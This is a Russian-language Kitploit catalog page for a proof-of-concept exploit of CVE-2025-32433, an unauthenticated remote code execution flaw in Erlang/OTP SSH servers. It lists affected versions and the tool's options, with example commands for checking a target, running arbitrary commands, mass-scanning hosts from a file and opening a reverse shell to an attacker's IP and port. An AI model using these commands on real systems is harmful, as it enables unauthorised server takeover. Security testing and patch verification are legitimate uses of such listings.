Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC — Уязвимость позволяет атакующему, имеющему сетевой доступ к SSH-серверу Erlang/OTP, выполнить произвольный код без предварительной аутентификации. | Kitploit
Инструменты/GitHubGitHub/omer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc
Анализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubomer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

Уязвимость позволяет атакующему, имеющему сетевой доступ к SSH-серверу Erlang/OTP, выполнить произвольный код без предварительной аутентификации.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1621 год назадЕщё не проверено

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

Уязвимость позволяет атакующему, имеющему сетевой доступ к SSH-серверу Erlang/OTP, выполнять произвольный код без предварительной аутентификации.

Описание

В SSH-сервере Erlang/OTP выявлена серьёзная уязвимость, которая может позволить атакующему осуществить удалённое выполнение кода (RCE) без аутентификации. Используя недостаток в обработке сообщений протокола SSH, злоумышленник может получить несанкционированный доступ к затронутым системам и выполнять произвольные команды без действительных учётных данных. Это может привести к компрометации указанных хостов, что позволит третьим лицам получить несанкционированный доступ к конфиденциальным данным и манипулировать ими либо приведёт к атакам типа «отказ в обслуживании».

Затронутые версии

root@kitploit:~
OTP-27.3.2 и более ранние
OTP-26.2.5.10 и более ранние
OTP-25.3.2.19 и более ранние

Возможности

  • Проверка уязвимости: определение, уязвима ли цель к CVE-2025-32433.
  • Выполнение эксплойта: выполнение произвольных команд.
  • Обратная оболочка: запуск обратной оболочки на основе bash.

Использование

root@kitploit:~
python cve-2025-32433.py <host> [options]

Параметры:

root@kitploit:~
-p PORT, --port PORT: порт SSH (по умолчанию: 22)

-t TIMEOUT, --timeout TIMEOUT: время ожидания подключения в секундах (по умолчанию: 5)

-c COMMAND, --command COMMAND: пользовательская команда для выполнения

--check: проверить, уязвима ли цель

-u urls.txt, --urlfile urls.txt: файл со списком хостов для сканирования (по одному в строке)

-o output.txt, --output output.txt: выходной файл для сохранения результатов.

--shell: запустить обратную оболочку

--lhost LHOST: IP-адрес атакующего для обратной оболочки

--lport LPORT: порт атакующего для обратной оболочки (по умолчанию: 4444)

Примеры:

Проверка уязвимости:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --check

Выполнение команды:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'

Запуск обратной оболочки:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

Ссылки

GitHub Advisory

NVD CVE-2025-32433

Platform Security

Скачать инструмент